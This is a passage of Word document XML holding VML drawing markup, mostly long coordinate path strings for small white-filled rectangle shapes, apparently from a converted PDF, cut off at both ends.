887,4856,11888,4856,11888,4856,11889,4856,11890,4856,11890,4856,11891,4856,11892,4856,11893,4856,11894,4856,11895,4856,11896,4856,11897,4856,11898,4856,11899,4856,11900,4856,11901,4856,11903,4856,11904,4856,11905,4856,11907,4856,11908,4856,11910,4856,11911,4856,11913,4856,11914,4856,11916,4856,11918,4856,11920,4856,11922,4856,11924,4856,11926,4856,11928,4856,11930,4856,11932,4856,11934,4856,11936,4856,11939,4856,11941,4856,11944,4856,11946,4856,11949,4856,11952,4856,11955,4856,11958,4856,11960,4856,11963,4856,11967,4856,11970,4856,11973,4856,11976,4856,11980,4856,11983,4856,11987,4856,11990,4856,11994,4856,11998,4856,12002,4856,12006,4856,12010,4856,12014,4856,12018,4856,12022,4856,12027,4856,12031,4856,12036,4856,12041,4856,12045,4856,12050,4856,12055,4856,12060,4856,12065,4856,12071,4856,12076,4856,12081,4856,12087,4856,12093,4856,12098,4856,12104,4856,12110,4856,12116,4856,12122,4856,12129,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4856,12135,4855,12135,4855,12135,4855,12135,4855,12135,4855,12135,4855,12135,4855,12135,4854,12135,4854,12135,4854,12135,4854,12135,4853,12135,4853,12135,4853,12135,4853,12135,4852,12135,4852,12135,4852,12135,4851,12135,4851,12135,4850,12135,4850,12135,4850,12135,4849,12135,4849,12135,4848,12135,4848,12135,4847,12135,4846,12135,4846,12135,4845,12135,4845,12135,4844,12135,4843,12135,4843,12135,4842,12135,4841,12135,4840,12135,4839,12135,4839,12135,4838,12135,4837,12135,4836,12135,4835,12135,4834,12135,4833,12135,4832,12135,4831,12135,4830,12135,4829,12135,4828,12135,4826,12135,4825,12135,4824,12135,4823,12135,4821,12135,4820,12135,4819,12135,4817,12135,4816,12135,4814,12135,4813,12135,4811,12135,4810,12135,4808,12135,4806,12135,4805,12135,4803,12135,4801,12135,4799,12135,4797,12135,4795,12135,4793,12135,4791,12135,4789,12135,4787,12135,4785,12135,4783,12135,4781,12135,4779,12135,4776,12135,4774,12135,4772,12135,4769,12135,4767,12135,4764,12135,4762,12135,4759,12135,4756,12135,4754,12135,4751,12135,4748,12135,4745,12135,4742,12135,4739,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12135,4736,12134,4736,12134,4736,12134,4736,12134,4736,12134,4736,12134,4736,12134,4736,12133,4736,12133,4736,12133,4736,12132,4736,12132,4736,12132,4736,12131,4736,12131,4736,12131,4736,12130,4736,12130,4736,12129,4736,12129,4736,12128,4736,12127,4736,12127,4736,12126,4736,12125,4736,12125,4736,12124,4736,12123,4736,12122,4736,12121,4736,12120,4736,12119,4736,12118,4736,12117,4736,12116,4736,12115,4736,12114,4736,12113,4736,12111,4736,12110,4736,12109,4736,12107,4736,12106,4736,12104,4736,12102,4736,12101,4736,12099,4736,12097,4736,12095,4736,12094,4736,12092,4736,12090,4736,12088,4736,12085,4736,12083,4736,12081,4736,12079,4736,12076,4736,12074,4736,12071,4736,12069,4736,12066,4736,12063,4736,12060,4736,12058,4736,12055,4736,12052,4736,12049,4736,12045,4736,12042,4736,12039,4736,12035,4736,12032,4736,12028,4736,12025,4736,12021,4736,12017,4736,12013,4736,12009,4736,12005,4736,12001,4736,11997,4736,11993,4736,11988,4736,11984,4736,11979,4736,11974,4736,11970,4736,11965,4736,11960,4736,11955,4736,11950,4736,11944,4736,11939,4736,11934,4736,11928,4736,11922,4736,11917,4736,11911,4736,11905,4736,11899,4736,11893,4736,11886,4736,11880e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:593.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,11870" coordsize="130,250">
        <v:shape style="position:absolute;left:6390;top:11870;width:130;height:250" coordorigin="6390,11870" coordsize="130,250" path="m6417,11880l6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6417,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6418,11880,6419,11880,6419,11880,6419,11880,6419,11880,6419,11880,6420,11880,6420,11880,6420,11880,6420,11880,6421,11880,6421,11880,6421,11880,6421,11880,6422,11880,6422,11880,6423,11880,6423,11880,6423,11880,6424,11880,6424,11880,6425,11880,6425,11880,6426,11880,6426,11880,6427,11880,6427,11880,6428,11880,6428,11880,6429,11880,6430,11880,6430,11880,6431,11880,6432,11880,6433,11880,6433,11880,6434,11880,6435,11880,6436,11880,6437,11880,6438,11880,6439,11880,6440,11880,6441,11880,6442,11880,6443,11880,6444,11880,6445,11880,6446,11880,6447,11880,6449,11880,6450,11880,6451,11880,6452,11880,6454,11880,6455,11880,6457,11880,6458,11880,6459,11880,6461,11880,6463,11880,6464,11880,6466,11880,6467,11880,6469,11880,6471,11880,6473,11880,6475,11880,6476,11880,6478,11880,6480,11880,6482,11880,6484,11880,6486,11880,6488,11880,6491,11880,6493,11880,6495,11880,6497,11880,6500,11880,6502,11880,6505,11880,6507,11880,6509,11880,6512,11880,6515,11880,6517,11880,6520,11880,6523,11880,6526,11880,6528,11880,6531,11880,6534,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11880,6537,11881,6537,11881,6537,11881,6537,11881,6537,11881,6537,11881,6537,11882,6537,11882,6537,11882,6537,11882,6537,11883,6537,11883,6537,11883,6537,11884,6537,11884,6537,11884,6537,11885,6537,11885,6537,11886,6537,11886,6537,11887,6537,11888,6537,11888,6537,11889,6537,11890,6537,11890,6537,11891,6537,11892,6537,11893,6537,11894,6537,11895,6537,11896,6537,11897,6537,11898,6537,11899,6537,11900,6537,11901,6537,11903,6537,11904,6537,11905,6537,11907,6537,11908,6537,11910,6537,11911,6537,11913,6537,11914,6537,11916,6537,11918,6537,11920,6537,11922,6537,11924,6537,11926,6537,11928,6537,11930,6537,11932,6537,11934,6537,11936,6537,11939,6537,11941,6537,11944,6537,11946,6537,11949,6537,11952,6537,11955,6537,11958,6537,11960,6537,11963,6537,11967,6537,11970,6537,11973,6537,11976,6537,11980,6537,11983,6537,11987,6537,11990,6537,11994,6537,11998,6537,12002,6537,12006,6537,12010,6537,12014,6537,12018,6537,12022,6537,12027,6537,12031,6537,12036,6537,12041,6537,12045,6537,12050,6537,12055,6537,12060,6537,12065,6537,12071,6537,12076,6537,12081,6537,12087,6537,12093,6537,12098,6537,12104,6537,12110,6537,12116,6537,12122,6537,12129,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6537,12135,6536,12135,6536,12135,6536,12135,6536,12135,6536,12135,6536,12135,6536,12135,6535,12135,6535,12135,6535,12135,6535,12135,6534,12135,6534,12135,6534,12135,6534,12135,6533,12135,6533,12135,6533,12135,6532,12135,6532,12135,6532,12135,6531,12135,6531,12135,6530,12135,6530,12135,6529,12135,6529,12135,6528,12135,6528,12135,6527,12135,6527,12135,6526,12135,6525,12135,6525,12135,6524,12135,6523,12135,6523,12135,6522,12135,6521,12135,6520,12135,6519,12135,6519,12135,6518,12135,6517,12135,6516,12135,6515,12135,6514,12135,6513,12135,6512,12135,6511,12135,6510,12135,6508,12135,6507,12135,6506,12135,6505,12135,6503,12135,6502,12135,6501,12135,6499,12135,6498,12135,6497,12135,6495,12135,6494,12135,6492,12135,6490,12135,6489,12135,6487,12135,6485,12135,6484,12135,6482,12135,6480,12135,6478,12135,6476,12135,6474,12135,6472,12135,6470,12135,6468,12135,6466,12135,6464,12135,6462,12135,6459,12135,6457,12135,6455,12135,6452,12135,6450,12135,6448,12135,6445,12135,6442,12135,6440,12135,6437,12135,6434,12135,6432,12135,6429,12135,6426,12135,6423,12135,6420,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12135,6417,12134,6417,12134,6417,12134,6417,12134,6417,12134,6417,12134,6417,12134,6417,12133,6417,12133,6417,12133,6417,12132,6417,12132,6417,12132,6417,12131,6417,12131,6417,12131,6417,12130,6417,12130,6417,12129,6417,12129,6417,12128,6417,12127,6417,12127,6417,12126,6417,12125,6417,12125,6417,12124,6417,12123,6417,12122,6417,12121,6417,12120,6417,12119,6417,12118,6417,12117,6417,12116,6417,12115,6417,12114,6417,12113,6417,12111,6417,12110,6417,12109,6417,12107,6417,12106,6417,12104,6417,12102,6417,12101,6417,12099,6417,12097,6417,12095,6417,12094,6417,12092,6417,12090,6417,12088,6417,12085,6417,12083,6417,12081,6417,12079,6417,12076,6417,12074,6417,12071,6417,12069,6417,12066,6417,12063,6417,12060,6417,12058,6417,12055,6417,12052,6417,12049,6417,12045,6417,12042,6417,12039,6417,12035,6417,12032,6417,12028,6417,12025,6417,12021,6417,12017,6417,12013,6417,12009,6417,12005,6417,12001,6417,11997,6417,11993,6417,11988,6417,11984,6417,11979,6417,11974,6417,11970,6417,11965,6417,11960,6417,11955,6417,11950,6417,11944,6417,11939,6417,11934,6417,11928,6417,11922,6417,11917,6417,11911,6417,11905,6417,11899,6417,11893,6417,11886,6417,11880e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:175.500pt;margin-top:606.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3510,12130" coordsize="130,270">
        <v:shape style="position:absolute;left:3510;top:12130;width:130;height:270" coordorigin="3510,12130" coordsize="130,270" path="m3521,12150l3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3521,12150,3522,12150,3522,12150,3522,12150,3522,12150,3522,12150,3522,12150,3522,12150,3523,12150,3523,12150,3523,12150,3523,12150,3523,12150,3524,12150,3524,12150,3524,12150,3524,12150,3525,12150,3525,12150,3525,12150,3526,12150,3526,12150,3526,12150,3527,12150,3527,12150,3528,12150,3528,12150,3529,12150,3529,12150,3530,12150,3530,12150,3531,12150,3531,12150,3532,12150,3533,12150,3533,12150,3534,12150,3535,12150,3535,12150,3536,12150,3537,12150,3538,12150,3539,12150,3539,12150,3540,12150,3541,12150,3542,12150,3543,12150,3544,12150,3545,12150,3546,12150,3547,12150,3548,12150,3550,12150,3551,12150,3552,12150,3553,12150,3555,12150,3556,12150,3557,12150,3559,12150,3560,12150,3562,12150,3563,12150,3565,12150,3566,12150,3568,12150,3569,12150,3571,12150,3573,12150,3574,12150,3576,12150,3578,12150,3580,12150,3582,12150,3584,12150,3586,12150,3588,12150,3590,12150,3592,12150,3594,12150,3596,12150,3599,12150,3601,12150,3603,12150,3606,12150,3608,12150,3611,12150,3613,12150,3616,12150,3618,12150,3621,12150,3624,12150,3626,12150,3629,12150,3632,12150,3635,12150,3638,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12150,3641,12151,3641,12151,3641,12151,3641,12151,3641,12151,3641,12151,3641,12151,3641,12152,3641,12152,3641,12152,3641,12152,3641,12152,3641,12153,3641,12153,3641,12153,3641,12154,3641,12154,3641,12155,3641,12155,3641,12156,3641,12156,3641,12157,3641,12157,3641,12158,3641,12158,3641,12159,3641,12160,3641,12161,3641,12161,3641,12162,3641,12163,3641,12164,3641,12165,3641,12166,3641,12167,3641,12168,3641,12169,3641,12170,3641,12171,3641,12173,3641,12174,3641,12175,3641,12177,3641,12178,3641,12180,3641,12181,3641,12183,3641,12184,3641,12186,3641,12188,3641,12190,3641,12192,3641,12194,3641,12196,3641,12198,3641,12200,3641,12202,3641,12204,3641,12207,3641,12209,3641,12211,3641,12214,3641,12217,3641,12219,3641,12222,3641,12225,3641,12228,3641,12231,3641,12234,3641,12237,3641,12240,3641,12243,3641,12246,3641,12250,3641,12253,3641,12257,3641,12260,3641,12264,3641,12268,3641,12272,3641,12276,3641,12280,3641,12284,3641,12288,3641,12293,3641,12297,3641,12302,3641,12306,3641,12311,3641,12316,3641,12320,3641,12325,3641,12330,3641,12336,3641,12341,3641,12346,3641,12352,3641,12357,3641,12363,3641,12369,3641,12374,3641,12380,3641,12386,3641,12393,3641,12399,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3641,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3640,12405,3639,12405,3639,12405,3639,12405,3639,12405,3639,12405,3638,12405,3638,12405,3638,12405,3638,12405,3638,12405,3637,12405,3637,12405,3637,12405,3636,12405,3636,12405,3636,12405,3635,12405,3635,12405,3634,12405,3634,12405,3633,12405,3633,12405,3632,12405,3632,12405,3631,12405,3631,12405,3630,12405,3630,12405,3629,12405,3628,12405,3628,12405,3627,12405,3626,12405,3625,12405,3625,12405,3624,12405,3623,12405,3622,12405,3621,12405,3620,12405,3619,12405,3618,12405,3617,12405,3616,12405,3615,12405,3614,12405,3613,12405,3612,12405,3611,12405,3610,12405,3608,12405,3607,12405,3606,12405,3604,12405,3603,12405,3602,12405,3600,12405,3599,12405,3597,12405,3596,12405,3594,12405,3592,12405,3591,12405,3589,12405,3587,12405,3585,12405,3584,12405,3582,12405,3580,12405,3578,12405,3576,12405,3574,12405,3572,12405,3570,12405,3567,12405,3565,12405,3563,12405,3561,12405,3558,12405,3556,12405,3554,12405,3551,12405,3549,12405,3546,12405,3543,12405,3541,12405,3538,12405,3535,12405,3532,12405,3530,12405,3527,12405,3524,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12405,3521,12404,3521,12404,3521,12404,3521,12404,3521,12404,3521,12403,3521,12403,3521,12403,3521,12403,3521,12402,3521,12402,3521,12402,3521,12401,3521,12401,3521,12400,3521,12400,3521,12399,3521,12399,3521,12398,3521,12398,3521,12397,3521,12396,3521,12396,3521,12395,3521,12394,3521,12393,3521,12392,3521,12391,3521,12391,3521,12390,3521,12389,3521,12387,3521,12386,3521,12385,3521,12384,3521,12383,3521,12381,3521,12380,3521,12379,3521,12377,3521,12376,3521,12374,3521,12373,3521,12371,3521,12369,3521,12367,3521,12366,3521,12364,3521,12362,3521,12360,3521,12358,3521,12356,3521,12353,3521,12351,3521,12349,3521,12346,3521,12344,3521,12341,3521,12339,3521,12336,3521,12333,3521,12331,3521,12328,3521,12325,3521,12322,3521,12319,3521,12316,3521,12312,3521,12309,3521,12306,3521,12302,3521,12299,3521,12295,3521,12291,3521,12287,3521,12283,3521,12280,3521,12275,3521,12271,3521,12267,3521,12263,3521,12258,3521,12254,3521,12249,3521,12245,3521,12240,3521,12235,3521,12230,3521,12225,3521,12220,3521,12215,3521,12209,3521,12204,3521,12198,3521,12193,3521,12187,3521,12181,3521,12175,3521,12169,3521,12163,3521,12157,3521,12150e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:325.500pt;margin-top:606.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6510,12130" coordsize="130,270">
        <v:shape style="position:absolute;left:6510;top:12130;width:130;height:270" coordorigin="6510,12130" coordsize="130,270" path="m6522,12150l6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6522,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6523,12150,6524,12150,6524,12150,6524,12150,6524,12150,6524,12150,6524,12150,6525,12150,6525,12150,6525,12150,6525,12150,6526,12150,6526,12150,6526,12150,6527,12150,6527,12150,6527,12150,6528,12150,6528,12150,6528,12150,6529,12150,6529,12150,6530,12150,6530,12150,6531,12150,6531,12150,6532,12150,6532,12150,6533,12150,6534,12150,6534,12150,6535,12150,6535,12150,6536,12150,6537,12150,6538,12150,6538,12150,6539,12150,6540,12150,6541,12150,6542,12150,6543,12150,6544,12150,6545,12150,6546,12150,6547,12150,6548,12150,6549,12150,6550,12150,6551,12150,6552,12150,6554,12150,6555,12150,6556,12150,6557,12150,6559,12150,6560,12150,6562,12150,6563,12150,6565,12150,6566,12150,6568,12150,6569,12150,6571,12150,6573,12150,6574,12150,6576,12150,6578,12150,6580,12150,6581,12150,6583,12150,6585,12150,6587,12150,6589,12150,6591,12150,6594,12150,6596,12150,6598,12150,6600,12150,6602,12150,6605,12150,6607,12150,6610,12150,6612,12150,6615,12150,6617,12150,6620,12150,6622,12150,6625,12150,6628,12150,6631,12150,6633,12150,6636,12150,6639,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12150,6642,12151,6642,12151,6642,12151,6642,12151,6642,12151,6642,12151,6642,12151,6642,12152,6642,12152,6642,12152,6642,12152,6642,12152,6642,12153,6642,12153,6642,12153,6642,12154,6642,12154,6642,12155,6642,12155,6642,12156,6642,12156,6642,12157,6642,12157,6642,12158,6642,12158,6642,12159,6642,12160,6642,12161,6642,12161,6642,12162,6642,12163,6642,12164,6642,12165,6642,12166,6642,12167,6642,12168,6642,12169,6642,12170,6642,12171,6642,12173,6642,12174,6642,12175,6642,12177,6642,12178,6642,12180,6642,12181,6642,12183,6642,12184,6642,12186,6642,12188,6642,12190,6642,12192,6642,12194,6642,12196,6642,12198,6642,12200,6642,12202,6642,12204,6642,12207,6642,12209,6642,12211,6642,12214,6642,12217,6642,12219,6642,12222,6642,12225,6642,12228,6642,12231,6642,12234,6642,12237,6642,12240,6642,12243,6642,12246,6642,12250,6642,12253,6642,12257,6642,12260,6642,12264,6642,12268,6642,12272,6642,12276,6642,12280,6642,12284,6642,12288,6642,12293,6642,12297,6642,12302,6642,12306,6642,12311,6642,12316,6642,12320,6642,12325,6642,12330,6642,12336,6642,12341,6642,12346,6642,12352,6642,12357,6642,12363,6642,12369,6642,12374,6642,12380,6642,12386,6642,12393,6642,12399,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6642,12405,6641,12405,6641,12405,6641,12405,6641,12405,6641,12405,6641,12405,6641,12405,6640,12405,6640,12405,6640,12405,6640,12405,6640,12405,6639,12405,6639,12405,6639,12405,6638,12405,6638,12405,6638,12405,6637,12405,6637,12405,6637,12405,6636,12405,6636,12405,6635,12405,6635,12405,6634,12405,6634,12405,6633,12405,6633,12405,6632,12405,6632,12405,6631,12405,6630,12405,6630,12405,6629,12405,6628,12405,6628,12405,6627,12405,6626,12405,6625,12405,6625,12405,6624,12405,6623,12405,6622,12405,6621,12405,6620,12405,6619,12405,6618,12405,6617,12405,6616,12405,6615,12405,6613,12405,6612,12405,6611,12405,6610,12405,6609,12405,6607,12405,6606,12405,6604,12405,6603,12405,6602,12405,6600,12405,6599,12405,6597,12405,6595,12405,6594,12405,6592,12405,6590,12405,6589,12405,6587,12405,6585,12405,6583,12405,6581,12405,6579,12405,6577,12405,6575,12405,6573,12405,6571,12405,6569,12405,6567,12405,6564,12405,6562,12405,6560,12405,6557,12405,6555,12405,6553,12405,6550,12405,6548,12405,6545,12405,6542,12405,6540,12405,6537,12405,6534,12405,6531,12405,6528,12405,6525,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12405,6522,12404,6522,12404,6522,12404,6522,12404,6522,12404,6522,12403,6522,12403,6522,12403,6522,12403,6522,12402,6522,12402,6522,12402,6522,12401,6522,12401,6522,12400,6522,12400,6522,12399,6522,12399,6522,12398,6522,12398,6522,12397,6522,12396,6522,12396,6522,12395,6522,12394,6522,12393,6522,12392,6522,12391,6522,12391,6522,12390,6522,12389,6522,12387,6522,12386,6522,12385,6522,12384,6522,12383,6522,12381,6522,12380,6522,12379,6522,12377,6522,12376,6522,12374,6522,12373,6522,12371,6522,12369,6522,12367,6522,12366,6522,12364,6522,12362,6522,12360,6522,12358,6522,12356,6522,12353,6522,12351,6522,12349,6522,12346,6522,12344,6522,12341,6522,12339,6522,12336,6522,12333,6522,12331,6522,12328,6522,12325,6522,12322,6522,12319,6522,12316,6522,12312,6522,12309,6522,12306,6522,12302,6522,12299,6522,12295,6522,12291,6522,12287,6522,12283,6522,12280,6522,12275,6522,12271,6522,12267,6522,12263,6522,12258,6522,12254,6522,12249,6522,12245,6522,12240,6522,12235,6522,12230,6522,12225,6522,12220,6522,12215,6522,12209,6522,12204,6522,12198,6522,12193,6522,12187,6522,12181,6522,12175,6522,12169,6522,12163,6522,12157,6522,12150e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:638.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,12770" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:12770;width:130;height:250" coordorigin="4710,12770" coordsize="130,250" path="m4736,12780l4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4736,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4737,12780,4738,12780,4738,12780,4738,12780,4738,12780,4738,12780,4739,12780,4739,12780,4739,12780,4739,12780,4739,12780,4740,12780,4740,12780,4740,12780,4741,12780,4741,12780,4741,12780,4742,12780,4742,12780,4742,12780,4743,12780,4743,12780,4744,12780,4744,12780,4745,12780,4745,12780,4746,12780,4746,12780,4747,12780,4748,12780,4748,12780,4749,12780,4750,12780,4750,12780,4751,12780,4752,12780,4753,12780,4753,12780,4754,12780,4755,12780,4756,12780,4757,12780,4758,12780,4759,12780,4760,12780,4761,12780,4762,12780,4763,12780,4764,12780,4765,12780,4766,12780,4768,12780,4769,12780,4770,12780,4772,12780,4773,12780,4774,12780,4776,12780,4777,12780,4779,12780,4780,12780,4782,12780,4783,12780,4785,12780,4787,12780,4788,12780,4790,12780,4792,12780,4794,12780,4796,12780,4797,12780,4799,12780,4801,12780,4803,12780,4806,12780,4808,12780,4810,12780,4812,12780,4814,12780,4817,12780,4819,12780,4821,12780,4824,12780,4826,12780,4829,12780,4831,12780,4834,12780,4836,12780,4839,12780,4842,12780,4845,12780,4848,12780,4850,12780,4853,12780,4856,12780,4856,12780,4856,12780,4856,12780,4856,12780,4856,12780,4856,12780,4856,12780,4856,12780,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12781,4856,12782,4856,12782,4856,12782,4856,12782,4856,12783,4856,12783,4856,12783,4856,12783,4856,12784,4856,12784,4856,12785,4856,12785,4856,12785,4856,12786,4856,12786,4856,12787,4856,12788,4856,12788,4856,12789,4856,12789,4856,12790,4856,12791,4856,12792,4856,12792,4856,12793,4856,12794,4856,12795,4856,12796,4856,12797,4856,12798,4856,12799,4856,12801,4856,12802,4856,12803,4856,12804,4856,12806,4856,12807,4856,12808,4856,12810,4856,12812,4856,12813,4856,12815,4856,12817,4856,12818,4856,12820,4856,12822,4856,12824,4856,12826,4856,12828,4856,12830,4856,12832,4856,12835,4856,12837,4856,12839,4856,12842,4856,12844,4856,12847,4856,12850,4856,12852,4856,12855,4856,12858,4856,12861,4856,12864,4856,12867,4856,12870,4856,12873,4856,12877,4856,12880,4856,12884,4856,12887,4856,12891,4856,12895,4856,12898,4856,12902,4856,12906,4856,12910,4856,12914,4856,12919,4856,12923,4856,12927,4856,12932,4856,12936,4856,12941,4856,12946,4856,12951,4856,12956,4856,12961,4856,12966,4856,12971,4856,12977,4856,12982,4856,12987,4856,12993,4856,12999,4856,13005,4856,13011,4856,13017,4856,13023,4856,13029,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4856,13036,4855,13036,4855,13036,4855,13036,4855,13036,4855,13036,4855,13036,4855,13036,4854,13036,4854,13036,4854,13036,4854,13036,4853,13036,4853,13036,4853,13036,4853,13036,4852,13036,4852,13036,4852,13036,4851,13036,4851,13036,4850,13036,4850,13036,4850,13036,4849,13036,4849,13036,4848,13036,4848,13036,4847,13036,4846,13036,4846,13036,4845,13036,4845,13036,4844,13036,4843,13036,4843,13036,4842,13036,4841,13036,4840,13036,4839,13036,4839,13036,4838,13036,4837,13036,4836,13036,4835,13036,4834,13036,4833,13036,4832,13036,4831,13036,4830,13036,4829,13036,4828,13036,4826,13036,4825,13036,4824,13036,4823,13036,4821,13036,4820,13036,4819,13036,4817,13036,4816,13036,4814,13036,4813,13036,4811,13036,4810,13036,4808,13036,4806,13036,4805,13036,4803,13036,4801,13036,4799,13036,4797,13036,4795,13036,4793,13036,4791,13036,4789,13036,4787,13036,4785,13036,4783,13036,4781,13036,4779,13036,4776,13036,4774,13036,4772,13036,4769,13036,4767,13036,4764,13036,4762,13036,4759,13036,4756,13036,4754,13036,4751,13036,4748,13036,4745,13036,4742,13036,4739,13036,4736,13036,4736,13036,4736,13036,4736,13036,4736,13036,4736,13036,4736,13036,4736,13036,4736,13036,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13035,4736,13034,4736,13034,4736,13034,4736,13034,4736,13033,4736,13033,4736,13033,4736,13033,4736,13032,4736,13032,4736,13031,4736,13031,4736,13031,4736,13030,4736,13030,4736,13029,4736,13029,4736,13028,4736,13027,4736,13027,4736,13026,4736,13025,4736,13024,4736,13024,4736,13023,4736,13022,4736,13021,4736,13020,4736,13019,4736,13018,4736,13017,4736,13015,4736,13014,4736,13013,4736,13012,4736,13010,4736,13009,4736,13008,4736,13006,4736,13004,4736,13003,4736,13001,4736,12999,4736,12998,4736,12996,4736,12994,4736,12992,4736,12990,4736,12988,4736,12986,4736,12984,4736,12981,4736,12979,4736,12977,4736,12974,4736,12972,4736,12969,4736,12966,4736,12964,4736,12961,4736,12958,4736,12955,4736,12952,4736,12949,4736,12946,4736,12943,4736,12939,4736,12936,4736,12932,4736,12929,4736,12925,4736,12921,4736,12918,4736,12914,4736,12910,4736,12906,4736,12902,4736,12897,4736,12893,4736,12889,4736,12884,4736,12880,4736,12875,4736,12870,4736,12865,4736,12860,4736,12855,4736,12850,4736,12845,4736,12840,4736,12834,4736,12829,4736,12823,4736,12817,4736,12811,4736,12805,4736,12799,4736,12793,4736,12787,4736,12780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:638.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,12770" coordsize="130,250">
